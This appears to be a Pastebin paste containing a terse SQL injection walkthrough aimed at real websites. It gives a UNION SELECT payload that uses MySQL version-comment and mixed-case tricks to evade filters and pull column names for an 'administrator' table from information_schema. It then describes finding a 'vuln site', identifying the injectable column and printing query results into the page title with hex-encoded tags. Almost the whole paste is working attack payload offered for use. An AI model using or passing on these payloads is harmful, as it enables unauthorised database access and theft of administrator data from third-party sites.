Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Which Tag Use In Sqli For Print Tables And Columns Into The Main Page
- Help Me, Here Is My Code
- php?id=-5' /*!50000UNION*/ SELECT 1,2,3,/*!50000GrOuP_cOnCaT(column_name)*/,5,6,7,8,9,10,11,12,13 /*!50000from*/ Information_schema.columns where table_name=0x61646d696e6973747261746f72--+
- <title> hex it and put in script
- ==> find vuln site and try this step in those site which gives your result in title
- [+]===> </title> use this in hex
- so... query while be this 0x</title> in HEX
- Now if we use it in site then query will be
- www.site.com/index.php?id=2+union+select 1,2,3,4
- So vuln column is 2 then
- www.site.com/index.php?id=2+union+select 1,concat(0x</title>(IN HEX),0x3a,version()),3,4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement